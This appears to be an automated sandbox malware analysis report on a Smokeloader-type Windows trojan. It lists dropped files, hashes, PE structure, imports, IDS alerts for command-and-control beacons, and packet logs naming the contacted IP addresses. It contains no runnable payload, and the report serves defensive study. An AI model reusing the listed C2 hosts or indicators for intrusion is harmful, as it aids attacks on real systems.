	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	2Xz12CWeJC.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	v5Nmd23c88.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	LockerGoga ransomware.exe	Get hash	malicious	Browse	5.135.247.111

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	Y5dLrpJ2k3.exe	Get hash	malicious	Browse
	lrZBK88SwW.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\EE5A.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1073152
Entropy (8bit):	7.800005615070523
Encrypted:	false
SSDEEP:	24576:7WRAptQ16TfInIvitS/Y7OGpcvzSOjevqfW21j5AgNtvgwNwtJ:7WGI1SgnK+uneOaczp+L
MD5:	49D7D06EB3FD5E1DADAA505C021AA571
SHA1:	45F8B60703019D3605DECEA63C0FDB432194C4B2
SHA-256:	ED60811AACE1E6EF88644171C8CBC9F1D61C0DE87A389ACF32BBE502F368A12F
SHA-512:	A8BD3A0C03A832448016E573DF69D82D7D356A02C752F462DA1C3458CE7FDD1E40FF1C3735709BE32167D19226457BB73D13B3D8DC2C757ACF7D52AB7EB095AE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 48%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u...............................x`.........1.....................Rich....................PE..L...e..a.................z..........._............@................................./........................................}..P....P..`........................... ................................C..@............................................text...fx.......z.................. ..`.data...4........\...~..............@....rsrc...`....P......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F50.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	599040
Entropy (8bit):	7.538329945935505
Encrypted:	false
SSDEEP:	12288:S/VwX5av3q6jIUKhWBburVNHNZVQVw8wlQx+OJ:Sa5av3IUeWgr37VQa8bx3J
MD5:	47D4D75F4D1D3B2C16D375A671BF0FDC
SHA1:	2F55C731492FEE2361A4E61E208428ACE550A977
SHA-256:	F56F46AC0D1D1019F16204341EE0C49F8FF37529EEEA25A4ECA4ED3D60F8B106
SHA-512:	6A3423D03229EFC187C69121659C193C4B0C2D300844D4E0FF8C488293C78FBBDC4A3F3CFD0C3F238C132EA6979590BFA40266F6977D1028737D52279203E24E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u...............................x`.........1.....................Rich....................PE..L...P'/b.................z...t~......_............@..................................S.......................................}..P.....~.`........................... ................................C..@............................................text...fx.......z.................. ..`.data....{\|...... ...~..............@....rsrc...`.....~.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\EE5A.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	731648
Entropy (8bit):	6.87595719384168
Encrypted:	false
SSDEEP:	12288:V8jfuQWjK3lYRk52K/iAkyshv2zjTywBZmAUYiUy+Cz1yVBMjiItbNFNIJOI/rFu:V8DWK3l4kkEPjfywBLTvFFMjiItbNrdr
MD5:	9DD70D24B2657A9254B9FD536A4D06D5
SHA1:	348A1D210D7C4DAEF8ECDB692EADF3975971E8EE
SHA-256:	D0AC0E9021C6E231C60256198309B7F72CE4C5E772CF343B5456C2CE0664B9BD
SHA-512:	DEE5BFE83FDF196C78EE255E50A25994220CE9ECAC22EB24323DF70E668714D7A810B67DDACE7809D9D7E2160A35C4603DEEDB64B1660D82DDE58586C34D2AB6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Y5dLrpJ2k3.exe, Detection: malicious, Browse Filename: lrZBK88SwW.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e:..![.@![.@![.@.,.A&[.@.,.A [.@L..A"[.@![.@5[.@.D.@([.@...A [.@...A [.@...A [.@Rich![.@................PE..L....'.c...........!.........................................................`............@.............................@.......<...............................PF......................................................@............................text............................... ..`.rdata..............................@..@.data....2.......4..................@....reloc..PF.......H..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wdscede

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	6.575872566771664
Encrypted:	false
SSDEEP:	3072:dXhYovtL7/BW/LV/0q/R58doOWlbmW25E9WXxpxO5CzELEEhUZNTKXWPr0sd6:ZjL7/B2/0q/wd5kbmWEiWxuCYLiOuN
MD5:	635E3F021A205AD3A2BF9AAF3D278251
SHA1:	C4EFD1650FE3BDE0BCBA9AD2772B451B49809EF4
SHA-256:	FF69D65D2EACB1BD14DB2D94E9DD720AA66A5EF3D108A08D5AFE8A3166305617
SHA-512:	40C7AECD46FD7E0D2C68046407C7BC285300211165F1B92EC5FB3B187D3A05DD0FB1E91EC2E89D75386D28E28736532BC815D1415C3BA0E6093E56022159F640
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u...............................x`.........1.....................Rich....................PE..L..../.a.................z...ry......_............@...........................z......H.......................................}..P.....y.`........................... ................................C..@............................................text...fx.......z.................. ..`.data...Txw..........~..............@....rsrc...`.....y.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wdscede:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.575872566771664
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	270336
MD5:	635e3f021a205ad3a2bf9aaf3d278251
SHA1:	c4efd1650fe3bde0bcba9ad2772b451b49809ef4
SHA256:	ff69d65d2eacb1bd14db2d94e9dd720aa66a5ef3d108a08d5afe8a3166305617
SHA512:	40c7aecd46fd7e0d2c68046407c7bc285300211165f1b92ec5fb3b187d3a05dd0fb1e91ec2e89d75386d28e28736532bc815d1415c3ba0e6093e56022159f640
SSDEEP:	3072:dXhYovtL7/BW/LV/0q/R58doOWlbmW25E9WXxpxO5CzELEEhUZNTKXWPr0sd6:ZjL7/B2/0q/wd5kbmWEiWxuCYLiOuN
TLSH:	2944AE39358ACC7AC156F4705C35AAE5EFBABC739A20859337943B6F6E702D05222317
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u......................................x`.........1...........................Rich....................PE..L..../.a...........

File Icon


Icon Hash:	9062e090c6e73144

Static PE Info

General

Entrypoint:	0x405fbf
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x61E02F86 [Thu Jan 13 13:56:22 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b49d1773872141620d6e88f1989600b7

Entrypoint Preview

Instruction
call 00007F8710977318h
jmp 00007F871097108Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F8710971275h
call 00007F8710976FF5h
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [0042A2B8h]
je 00007F8710971224h
mov ecx, dword ptr [0042A1D4h]
test dword ptr [eax+70h], ecx
jne 00007F8710971219h
call 00007F8710977D2Bh
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [0042A0D8h]
je 00007F8710971228h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [0042A1D4h]
test dword ptr [eax+70h], ecx
jne 00007F871097121Ah
call 00007F871097759Fh
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007F8710971226h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007F871097121Ch
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
push esi
push dword ptr [ebp+0Ch]
lea ecx, dword ptr [ebp-10h]
call 00007F871097117Ah
mov esi, dword ptr [ebp+08h]
movsx eax, byte ptr [esi]
push eax
call 00007F8710977FD3h
cmp eax, 65h
jmp 00007F871097121Eh
inc esi
movzx eax, byte ptr [esi]
push eax
call 00007F8710977D7Ch
test eax, eax
pop ecx
jne 00007F8710971203h
movsx eax, byte ptr [esi]

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17dec	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2791000	0x18460	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1220	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x43b8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17866	0x17a00	False	0.5359519675925926	OpenPGP Public Key	6.3974793540665855	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x19000	0x2777854	0x11c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2791000	0x18460	0x18600	False	0.4747195512820513	data	5.258086247520373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x27a6b58	0x2	data
AFX_DIALOG_LAYOUT	0x27a6b50	0x2	data
AFX_DIALOG_LAYOUT	0x27a6b60	0x2	data
AFX_DIALOG_LAYOUT	0x27a6b68	0x2	data
AFX_DIALOG_LAYOUT	0x27a6b70	0x2	data
RT_CURSOR	0x27a6b78	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR	0x27a6cc0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR	0x27a6df0	0xf0	Device independent bitmap graphic, 24 x 48 x 1, image size 0
RT_CURSOR	0x27a6ee0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_CURSOR	0x27a7fb8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x27919e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Spanish	Venezuela
RT_ICON	0x27920a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Venezuela
RT_ICON	0x2792610	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Venezuela
RT_ICON	0x27936b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Venezuela
RT_ICON	0x2793b60	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Spanish	Venezuela
RT_ICON	0x2794a08	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Spanish	Venezuela
RT_ICON	0x27952b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Spanish	Venezuela
RT_ICON	0x2795978	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Spanish	Venezuela
RT_ICON	0x2795ee0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Spanish	Venezuela
RT_ICON	0x2798488	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Spanish	Venezuela
RT_ICON	0x2799530	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Spanish	Venezuela
RT_ICON	0x2799eb8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Spanish	Venezuela
RT_ICON	0x279a398	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Spanish	Venezuela
RT_ICON	0x279b240	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Spanish	Venezuela
RT_ICON	0x279b908	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Venezuela
RT_ICON	0x279be70	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Venezuela
RT_ICON	0x279e418	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Venezuela
RT_ICON	0x279f4c0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Spanish	Venezuela
RT_ICON	0x279fe48	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Venezuela
RT_ICON	0x27a0318	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Spanish	Venezuela
RT_ICON	0x27a11c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Spanish	Venezuela
RT_ICON	0x27a1a68	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Spanish	Venezuela
RT_ICON	0x27a2130	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Spanish	Venezuela
RT_ICON	0x27a2698	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Spanish	Venezuela
RT_ICON	0x27a4c40	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Spanish	Venezuela
RT_ICON	0x27a5ce8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Spanish	Venezuela
RT_ICON	0x27a6670	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Spanish	Venezuela
RT_STRING	0x27a89c8	0x38c	data	Spanish	Venezuela
RT_STRING	0x27a8d58	0x53c	data	Spanish	Venezuela
RT_STRING	0x27a9298	0x1c8	data	Spanish	Venezuela
RT_GROUP_CURSOR	0x27a6ca8	0x14	data
RT_GROUP_CURSOR	0x27a8860	0x14	data
RT_GROUP_CURSOR	0x27a7f88	0x30	data
RT_GROUP_ICON	0x279a320	0x76	data	Spanish	Venezuela
RT_GROUP_ICON	0x2793b20	0x3e	data	Spanish	Venezuela
RT_GROUP_ICON	0x27a02b0	0x68	data	Spanish	Venezuela
RT_GROUP_ICON	0x27a6ad8	0x76	data	Spanish	Venezuela
RT_VERSION	0x27a8878	0x150	data

Imports

DLL	Import
KERNEL32.dll	GetModuleHandleA, CreateDirectoryExA, ReadConsoleInputA, GetTempPathW, GetCurrentDirectoryW, RemoveDirectoryW, OutputDebugStringA, GetProcAddress, LocalAlloc, GetBinaryTypeW, SearchPathA, VerifyVersionInfoA, GetProcessPriorityBoost, EndUpdateResourceW, FindNextFileW, FindFirstVolumeW, LocalFree, GlobalFlags, UpdateResourceW, CreateActCtxA, CopyFileW, InterlockedExchangeAdd, GetConsoleAliasW, VerSetConditionMask, CreateMutexA, DeactivateActCtx, GetDiskFreeSpaceA, MoveFileW, GetLogicalDriveStringsA, ResetEvent, MoveFileExW, CreateMailslotA, WriteConsoleInputA, QueryDosDeviceW, InterlockedDecrement, EnumTimeFormatsW, lstrcatW, FindFirstFileA, FreeEnvironmentStringsA, SetErrorMode, GetTickCount, SetLastError, AllocateUserPhysicalPages, GetPrivateProfileStructA, CopyFileExA, MoveFileWithProgressA, LoadLibraryA, GetLastError, DeleteFileA, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RaiseException, VirtualAlloc, HeapReAlloc, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, ReadFile, HeapSize, CloseHandle, CreateFileA
GDI32.dll	GetTextFaceA
WINHTTP.dll	WinHttpWriteData

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Venezuela

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4211.119.84.11249697802851815 01/08/23-16:15:21.659638	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49697	80	192.168.2.4	211.119.84.112
192.168.2.458.235.189.19249696802851815 01/08/23-16:15:19.707702	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49696	80	192.168.2.4	58.235.189.192

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2023 16:15:17.873878002 CET	49695	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:18.065856934 CET	80	49695	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:18.066106081 CET	49695	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:18.067889929 CET	49695	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:18.067934036 CET	49695	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:18.255868912 CET	80	49695	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:18.914453030 CET	80	49695	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:18.914858103 CET	49695	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:18.920737028 CET	80	49695	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:18.920962095 CET	49695	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:19.110353947 CET	80	49695	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:19.427349091 CET	49696	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:19.697201014 CET	80	49696	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:19.698877096 CET	49696	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:19.707701921 CET	49696	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:19.707772970 CET	49696	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:19.977715969 CET	80	49696	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:20.906863928 CET	80	49696	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:20.906899929 CET	80	49696	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:20.907094002 CET	49696	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:20.907228947 CET	49696	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:21.176888943 CET	80	49696	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:21.408237934 CET	49697	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:21.659255981 CET	80	49697	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:21.659519911 CET	49697	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:21.659637928 CET	49697	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:21.659660101 CET	49697	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:21.910904884 CET	80	49697	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:22.608477116 CET	80	49697	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:22.608870983 CET	49697	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:22.609222889 CET	80	49697	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:22.609342098 CET	49697	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:22.639935017 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.667131901 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.667264938 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.667541027 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.694375038 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694494963 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694519997 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694546938 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694570065 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694595098 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694612980 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.694618940 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694644928 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694653988 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.694669962 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694709063 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694721937 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.694736958 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.694740057 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.694819927 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.721873999 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.721910000 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.721929073 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.721950054 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.721968889 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.721990108 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722007990 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.722012043 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722034931 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722052097 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.722055912 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722078085 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722086906 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.722096920 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722116947 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722136021 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722142935 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.722156048 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722176075 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722178936 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.722196102 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722215891 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722218990 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.722235918 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722254992 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722265959 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.722273111 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.722295046 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.722326994 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.749603987 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749635935 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749655008 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749674082 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749695063 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749713898 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749733925 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749752045 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749768972 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.749771118 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749794960 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749814987 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749830008 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.749835014 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749856949 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749864101 CET	49698	80	192.168.2.4	194.135.33.42
